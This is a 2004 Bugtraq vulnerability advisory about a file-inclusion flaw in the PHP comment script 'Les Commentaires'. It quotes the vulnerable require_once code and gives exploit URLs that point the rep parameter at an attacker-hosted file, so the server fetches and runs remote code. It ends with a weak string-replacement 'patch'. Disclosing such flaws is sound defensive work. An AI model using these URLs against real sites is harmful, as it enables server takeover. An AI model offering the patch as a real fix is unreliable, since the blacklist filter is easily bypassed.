Les Commentaires (PHP) Include file

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Les Commentaires (PHP) Include file
From: Himeur Nourredine <lostnoobs@xxxxxxxxxxxxxxxxxxxxxx>
Date: 3 Feb 2004 20:30:54 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Informations : 
°°°°°°°°°°°°°° 
Website : http://www.phpscripts-fr.net
Version : all
Problem : Include file 



PHP Code/Location : 
°°°°°°°°°°°°°°°°°°° 
config/fonctions.lib.php
derniers_commentaires.php
admin.php 
------------------------------------------------------------------ 
if (!isset($rep)) $rep = './';
require_once($rep.'config/fonctions.lib.php');
require_once($rep.'langues/'.$langue.'.lang.php');
------------------------------------------------------------------ 




Exploit : 
°°°°°°°°° 
http://[target]/config/fonctions.lib.php?rep=http://[attacker]/file.ext%3f
http://[target]/derniers_commentaires.php?rep=http://[attacker]/file.ext%3f
http://[target]/admin.php?rep=http://[attacker]/file.ext%3f


(the same but in local with = /langues/'.$langue.'.lang.php )


Patch : 
°°°°°°° 
You must to put a filter on the variable $rep and $langue.
like=
$rep= str_replace("..","lol",$rep);
AND
$rep= str_replace("://","lol",$rep);
(same with $langue)

Nourredine Himeur

www.security-challenge.com

Prev by Date: TA04-033A: Multiple Vulnerabilities in Microsoft Internet Explorer
Next by Date: Remote crash of Chaser game <= 1.50
Previous by thread: TA04-033A: Multiple Vulnerabilities in Microsoft Internet Explorer
Next by thread: Remote crash of Chaser game <= 1.50
Index(es):
- Date
- Thread